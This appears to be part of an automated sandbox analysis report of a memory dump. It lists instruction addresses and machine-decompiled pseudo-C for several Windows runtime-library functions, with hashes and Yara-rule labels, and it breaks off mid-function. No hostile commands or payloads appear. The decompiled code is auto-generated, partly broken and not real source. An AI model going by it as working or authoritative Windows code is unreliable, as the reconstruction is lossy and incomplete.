                                                    0x0128be5c
                                                    0x0128be5c
                                                    0x0128be60
                                                    0x00000000
                                                    0x0128be66
                                                    0x0128be66
                                                    0x0128be7f
                                                    0x0128be84
                                                    0x0128be87
                                                    0x0128be89
                                                    0x0128be8b
                                                    0x0128be99
                                                    0x0128be9d
                                                    0x0128bea0
                                                    0x0128beac
                                                    0x0128beaf
                                                    0x0128beb1
                                                    0x0128beb3
                                                    0x0128beb3
                                                    0x00000000
                                                    0x0128bea2
                                                    0x0128bea2
                                                    0x00000000
                                                    0x0128bea2
                                                    0x0128be8d
                                                    0x0128be8d
                                                    0x0128be92
                                                    0x00000000
                                                    0x0128be92
                                                    0x0128be8b
                                                    0x0128be60
                                                    0x0128be3b
                                                    0x0128be3b
                                                    0x0128be3e
                                                    0x00000000
                                                    0x0128be40
                                                    0x0128be40
                                                    0x0128be44
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0128be44
                                                    0x0128be3e
                                                    0x0128be29
                                                    0x0128be29
                                                    0x00000000
                                                    0x0128be29
                                                    0x0128be27
                                                    0x00000000
                                                    0x0124fba7
                                                    0x0124fba7
                                                    0x0124fbab
                                                    0x0128bf02
                                                    0x0124fbb1
                                                    0x0124fbb1
                                                    0x0124fbb8
                                                    0x0124fbbd
                                                    0x0124fbbd
                                                    0x0124fbbf
                                                    0x0124fbbf
                                                    0x0124fbc5
                                                    0x0124fbcb
                                                    0x0124fbf8
                                                    0x0124fbf8
                                                    0x0124fbfa
                                                    0x00000000
                                                    0x0124fc00
                                                    0x0124fc00
                                                    0x0124fc03
                                                    0x00000000
                                                    0x0124fc09
                                                    0x0124fc09
                                                    0x0124fc0f
                                                    0x0124fc15
                                                    0x0124fc23
                                                    0x0124fc23
                                                    0x0124fc25
                                                    0x0124fc27
                                                    0x0124fc75
                                                    0x0124fc7c
                                                    0x0124fc84
                                                    0x00000000
                                                    0x0124fc29
                                                    0x0124fc29
                                                    0x0124fc2d
                                                    0x0124fc30
                                                    0x0128bf0f
                                                    0x00000000
                                                    0x0124fc36
                                                    0x0124fc38
                                                    0x0124fc3b
                                                    0x0124fc41
                                                    0x0128bf17
                                                    0x0128bf19
                                                    0x0128bf48
                                                    0x0128bf4b
                                                    0x00000000
                                                    0x0128bf1b
                                                    0x0128bf22
                                                    0x0128bf24
                                                    0x0128bf26
                                                    0x00000000
                                                    0x0128bf2c
                                                    0x0128bf37
                                                    0x0128bf39
                                                    0x0128bf3b
                                                    0x00000000
                                                    0x0128bf41
                                                    0x0128bf41
                                                    0x0128bf41
                                                    0x0128bf41
                                                    0x0128bf45
                                                    0x00000000
                                                    0x0128bf45
                                                    0x0128bf3b
                                                    0x0128bf26
                                                    0x00000000
                                                    0x0124fc47
                                                    0x0124fc47
                                                    0x0124fc49
                                                    0x0124fcb2
                                                    0x0124fcb4
                                                    0x0124fcb6
                                                    0x0124fcdc
                                                    0x0124fcdc
                                                    0x00000000
                                                    0x0124fcb8
                                                    0x0124fcc3
                                                    0x0124fcc5
                                                    0x0124fcc7
                                                    0x00000000
                                                    0x0124fcc9
                                                    0x0124fcc9
                                                    0x0124fccd
                                                    0x00000000
                                                    0x0124fccd
                                                    0x0124fcc7
                                                    0x00000000
                                                    0x0124fc4b
                                                    0x0124fc4b
                                                    0x0124fc4e
                                                    0x0124fc4e
                                                    0x0124fc51
                                                    0x0124fc51
                                                    0x0124fc54
                                                    0x0124fc5a
                                                    0x0124fc5c
                                                    0x0124fc5f
                                                    0x0124fc61
                                                    0x0124fc63
                                                    0x0124fc65
                                                    0x0124fc67
                                                    0x0124fc6e
                                                    0x0124fc72
                                                    0x0124fc72
                                                    0x0124fc72
                                                    0x0124fc72
                                                    0x0124fc67
                                                    0x0124fc61
                                                    0x00000000
                                                    0x0124fc5a
                                                    0x0124fc49
                                                    0x0124fc41
                                                    0x0124fc30
                                                    0x0124fc27
                                                    0x0124fc03
                                                    0x0124fbcd
                                                    0x0124fbd3
                                                    0x0124fbd9
                                                    0x0124fbdc
                                                    0x0124fbde
                                                    0x0124fc99
                                                    0x0124fc9b
                                                    0x0124fc9d
                                                    0x0124fcd5
                                                    0x0124fcd5
                                                    0x0124fc89
                                                    0x0124fc89
                                                    0x00000000
                                                    0x0124fc9f
                                                    0x0124fc9f
                                                    0x0124fca3
                                                    0x00000000
                                                    0x0124fca3
                                                    0x00000000
                                                    0x0124fbe4
                                                    0x0124fbe4
                                                    0x0124fbe4
                                                    0x0124fbe4
                                                    0x0124fbe9
                                                    0x0124fbf2
                                                    0x00000000
                                                    0x0124fbf2
                                                    0x0124fbde
                                                    0x0124fbcb
                                                    0x0124fbab
                                                    0x0124fc8b
                                                    0x0124fc8b
                                                    0x0124fc8c
                                                    0x0124fb80
                                                    0x0124fb72
                                                    0x0124fb5e
                                                    0x0124fc8d
                                                    0x0124fc91
                                                    0x0124fadf
                                                    0x0124fadf
                                                    0x0124fae1
                                                    0x0124fae4
                                                    0x0124fae7
                                                    0x0124faec
                                                    0x0124faf8
                                                    0x0124fb00
                                                    0x0124fb07
                                                    0x0124fb0f
                                                    0x0124fb0f
                                                    0x0124fb07
                                                    0x00000000
                                                    0x0124faf8
                                                    0x0124fadd

                                                    Strings
                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0128BE0F
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                    • API String ID: 0-865735534
                                                    • Opcode ID: 1454545e102cf42c47710ee841fbbd2f4a488c808971442f70498c8799b5e8dc
                                                    • Instruction ID: b9a49c3bbe33ec2bd6ad39524ed37711dcd00b02d64a3dc268faaac57e3c25b1
                                                    • Opcode Fuzzy Hash: 1454545e102cf42c47710ee841fbbd2f4a488c808971442f70498c8799b5e8dc
                                                    • Instruction Fuzzy Hash: E4A10731B21A079FEB2ADF6CC550B7AB7A4AF88710F04456DDA46DB6C1DB70D801CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01212D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 63%
                                                    			E01212D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1305350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1307bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E012597C0();
				}
				if( *0x13079c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x13079c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01241624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01237D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E012AFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01259520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0124E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0126DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1306901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1306901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01259980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E012595D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01237D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01237D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01297016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E012AFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1305350;
							if(_t109 != 0x1305350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E012AFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E012A5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                    0x01212d8a
                                                    0x01212d8a
                                                    0x01212d92
                                                    0x01212d96
                                                    0x01212d9e
                                                    0x01212da0
                                                    0x01212da3
                                                    0x01212da5
                                                    0x01212da8
                                                    0x01212dab
                                                    0x01212db2
                                                    0x0126f9aa
                                                    0x0126f9ab
                                                    0x0126f9ae
                                                    0x0126f9ae
                                                    0x01212db8
                                                    0x01212dc2
                                                    0x0126f9b9
                                                    0x0126f9be
                                                    0x0126f9bf
                                                    0x0126f9bf
                                                    0x01212dcf
                                                    0x0126f9c9
                                                    0x01212dd5
                                                    0x01212dd5
                                                    0x01212dd5
                                                    0x01212dde
                                                    0x01212de1
                                                    0x01212e70
                                                    0x01212e72
                                                    0x01212e72
                                                    0x01212de7
                                                    0x01212deb
                                                    0x01212e7c
                                                    0x01212e83
                                                    0x01212e85
                                                    0x01212e8b
                                                    0x01212e8d
                                                    0x01212e92
                                                    0x01212e92
                                                    0x01212e85
                                                    0x01212df1
                                                    0x01212df7
                                                    0x01212df9
                                                    0x01212df9
                                                    0x01212dfc
                                                    0x01212dff
                                                    0x01212e02
                                                    0x00000000
                                                    0x01212e05
                                                    0x01212e0c
                                                    0x0126f9d9
                                                    0x01212e12
                                                    0x01212e12
                                                    0x01212e12
                                                    0x01212e1a
                                                    0x0126f9e3
                                                    0x0126f9e9
                                                    0x0126f9f0
                                                    0x0126f9f6
                                                    0x0126f9f8
                                                    0x0126f9f8
                                                    0x0126f9f0
                                                    0x01212e23
                                                    0x0126fa02
                                                    0x0126fa03
                                                    0x0126fa05
                                                    0x0126fa06
                                                    0x00000000
                                                    0x01212e29
                                                    0x01212e29
                                                    0x01212e2e
                                                    0x01212e34
                                                    0x01212e3e
                                                    0x00000000
                                                    0x00000000
                                                    0x01212e44
                                                    0x01212e47
                                                    0x01212e4d
                                                    0x00000000
                                                    0x00000000
                                                    0x01212e4f
                                                    0x01212e54
                                                    0x00000000
                                                    0x00000000
                                                    0x01212e5a
                                                    0x01212e5f
                                                    0x01212e9a
                                                    0x01212ea4
                                                    0x01212ea5
                                                    0x01212ea8
                                                    0x01212eaf
                                                    0x01212eb2
                                                    0x01212eb5
                                                    0x0126fae9
                                                    0x0126faeb
                                                    0x0126faed
                                                    0x0126faef
                                                    0x0126faf7
                                                    0x0126faf8
                                                    0x0126fafd
                                                    0x0126faff
                                                    0x0126fb04
                                                    0x0126fb04
                                                    0x0126faff
                                                    0x01212ec0
                                                    0x01212ec4
                                                    0x01212ec6
                                                    0x01212ec8
                                                    0x0126fb14
                                                    0x0126fb18
                                                    0x0126fb1e
                                                    0x0126fb21
                                                    0x0126fb21
                                                    0x01212ece
                                                    0x01212ece
                                                    0x01212ece
                                                    0x01212ed7
                                                    0x01212e61
                                                    0x01212e63
                                                    0x0126fa6b
                                                    0x0126fa71
                                                    0x0126fa76
                                                    0x0126fa78
                                                    0x0126fa8a
                                                    0x0126fa7a
                                                    0x0126fa83
                                                    0x0126fa83
                                                    0x0126fa8f
                                                    0x0126fa91
                                                    0x0126fa97
                                                    0x0126fa9d
                                                    0x0126faa4
                                                    0x0126faaa
                                                    0x0126faaf
                                                    0x0126fab1
                                                    0x0126fac3
                                                    0x0126fab3
                                                    0x0126fabc
                                                    0x0126fabc
                                                    0x0126fac8
                                                    0x0126facb
                                                    0x0126fadf
                                                    0x0126fadf
                                                    0x0126facb
                                                    0x0126faa4
                                                    0x0126fa91
                                                    0x01212e6f
                                                    0x01212e6f
                                                    0x01212e5f
                                                    0x0126fa13
                                                    0x0126fa15
                                                    0x0126fa17
                                                    0x0126fa1f
                                                    0x0126fa21
                                                    0x0126fa22
                                                    0x0126fa25
                                                    0x0126fa28
                                                    0x0126fa2f
                                                    0x0126fa2f
                                                    0x0126fa2a
                                                    0x0126fa2a
                                                    0x0126fa2a
                                                    0x0126fa31
                                                    0x0126fa34
                                                    0x0126fa36
                                                    0x0126fa3c
                                                    0x0126fa3e
                                                    0x0126fa41
                                                    0x0126fa43
                                                    0x0126fa45
                                                    0x0126fa45
                                                    0x0126fa41
                                                    0x0126fa3c
                                                    0x0126fa4a
                                                    0x0126fa4f
                                                    0x0126fa51
                                                    0x0126fa53
                                                    0x0126fa56
                                                    0x0126fa5b
                                                    0x0126fa5e
                                                    0x00000000
                                                    0x0126fa5e
                                                    0x01212e23

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Re-Waiting
                                                    • API String ID: 0-316354757
                                                    • Opcode ID: d272bfb42d999929e7206939e1366e627e37773aa44a1b3c2e9af7b66af42a99
                                                    • Instruction ID: 473938da3b2c184bf89c0ccf12d2fbb5df63ccb890efb30e552809ad710c6321
                                                    • Opcode Fuzzy Hash: d272bfb42d999929e7206939e1366e627e37773aa44a1b3c2e9af7b66af42a99
                                                    • Instruction Fuzzy Hash: 1E615531A20606DFEF32DF6CD9A0B7E7BE9EB54314F240269EA11972C1C774AD808781
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012E0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E012E0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E012DFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E012E1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01259730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E012DA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E012DA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1308b04 >> 0x14) + (_v44 -  *0x1308b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01237D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E012D138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01237D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E012CFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1308724 & 0x00000008) != 0) {
						E012D52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E012E15B5(0x1308ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                    0x012e0eb7
                                                    0x012e0eb9
                                                    0x012e0ec0
                                                    0x012e0ec2
                                                    0x012e0ecd
                                                    0x012e105b
                                                    0x012e105b
                                                    0x012e1061
                                                    0x012e1066
                                                    0x012e1066
                                                    0x012e106b
                                                    0x012e1073
                                                    0x012e1073
                                                    0x012e0ed3
                                                    0x012e0ed6
                                                    0x012e0edc
                                                    0x012e0ee0
                                                    0x012e0ee7
                                                    0x012e0ef0
                                                    0x012e0ef5
                                                    0x012e0efa
                                                    0x012e0efc
                                                    0x012e0efd
                                                    0x012e0f03
                                                    0x012e0f04
                                                    0x012e0f06
                                                    0x012e0f07
                                                    0x012e0f09
                                                    0x012e0f0e
                                                    0x012e0f14
                                                    0x012e0f23
                                                    0x012e0f2d
                                                    0x012e0f34
                                                    0x012e0f34
                                                    0x012e0f14
                                                    0x012e0f52
                                                    0x00000000
                                                    0x00000000
                                                    0x012e0f58
                                                    0x012e0f73
                                                    0x012e0f74
                                                    0x012e0f79
                                                    0x012e0f7d
                                                    0x012e0f80
                                                    0x012e0f86
                                                    0x012e0fab
                                                    0x012e0fb5
                                                    0x012e0fc6
                                                    0x012e0fd1
                                                    0x012e0fe3
                                                    0x012e0fd3
                                                    0x012e0fdc
                                                    0x012e0fdc
                                                    0x012e0feb
                                                    0x012e1009
                                                    0x012e1009
                                                    0x012e1015
                                                    0x012e1027
                                                    0x012e1017
                                                    0x012e1020
                                                    0x012e1020
                                                    0x012e102f
                                                    0x012e103c
                                                    0x012e103c
                                                    0x012e1048
                                                    0x012e1050
                                                    0x012e1050
                                                    0x012e1055
                                                    0x00000000
                                                    0x012e1055
                                                    0x012e0f88
                                                    0x012e0f9e
                                                    0x012e0fa2
                                                    0x012e0fa9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012e0fa9
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: a7dd4bb23d1ff6008c9e651875b1e25291c0f8d4b4e9d6752280fb8d4d77971b
                                                    • Instruction ID: 85f0f00227fdfa4fc52fa0e57b0833c87b8c9c9fa51a42c580a7269a2506c188
                                                    • Opcode Fuzzy Hash: a7dd4bb23d1ff6008c9e651875b1e25291c0f8d4b4e9d6752280fb8d4d77971b
                                                    • Instruction Fuzzy Hash: 9A51B1713243429FD725DF18D888B2BBBE5EBC4714F44092DFA4687290DB70E816C765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0124F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E0124F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01234120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01259830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01259990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E012595D0();
							goto L11;
						} else {
							_t109 = L01234620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0125F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E012595D0();
										L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                    0x0124f0d3
                                                    0x0124f0d9
                                                    0x0124f0e0
                                                    0x0124f0e7
                                                    0x0124f0f2
                                                    0x0124f0f4
                                                    0x0124f0f8
                                                    0x0124f100
                                                    0x0124f108
                                                    0x0124f10d
                                                    0x0124f115
                                                    0x0124f116
                                                    0x0124f11f
                                                    0x0124f123
                                                    0x0124f124
                                                    0x0124f12c
                                                    0x0124f130
                                                    0x0124f134
                                                    0x0124f13d
                                                    0x0124f144
                                                    0x0124f14b
                                                    0x0124f152
                                                    0x0128bab0
                                                    0x0128bab0
                                                    0x0124f158
                                                    0x0124f158
                                                    0x0124f15a
                                                    0x0124f160
                                                    0x0124f165
                                                    0x0124f166
                                                    0x0124f16f
                                                    0x0124f173
                                                    0x0128baa7
                                                    0x0128baa7
                                                    0x0128baab
                                                    0x00000000
                                                    0x0124f179
                                                    0x0124f18d
                                                    0x0124f191
                                                    0x0128baa2
                                                    0x00000000
                                                    0x0124f197
                                                    0x0124f19b
                                                    0x0124f1a2
                                                    0x0124f1a9
                                                    0x0124f1af
                                                    0x0124f1b2
                                                    0x0124f1b6
                                                    0x0124f1b9
                                                    0x0124f1c4
                                                    0x0124f1d8
                                                    0x0124f1df
                                                    0x0124f1e3
                                                    0x0124f1eb
                                                    0x0124f1ee
                                                    0x0124f1f4
                                                    0x0124f20f
                                                    0x0128bab7
                                                    0x0128babb
                                                    0x0128bacc
                                                    0x0128bad1
                                                    0x0124f215
                                                    0x0124f218
                                                    0x0124f226
                                                    0x0124f22b
                                                    0x00000000
                                                    0x0124f22b
                                                    0x0124f1f6
                                                    0x0124f1f6
                                                    0x0124f1f9
                                                    0x0124f1fb
                                                    0x0124f1fb
                                                    0x0124f1f4
                                                    0x0124f191
                                                    0x0124f173
                                                    0x0124f152
                                                    0x0124f203

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction ID: 007f8fb03d0924d9c6c9610397f6ce4b7639f900986a50a9c6b6a0c303d2f648
                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction Fuzzy Hash: D4519F71514711AFC321DF19C841A6BBBF8FF88710F00892DFA9597690E7B4E954CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01293540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E01293540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x130d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01250BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01293706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0125FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01293540;
						E0125FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
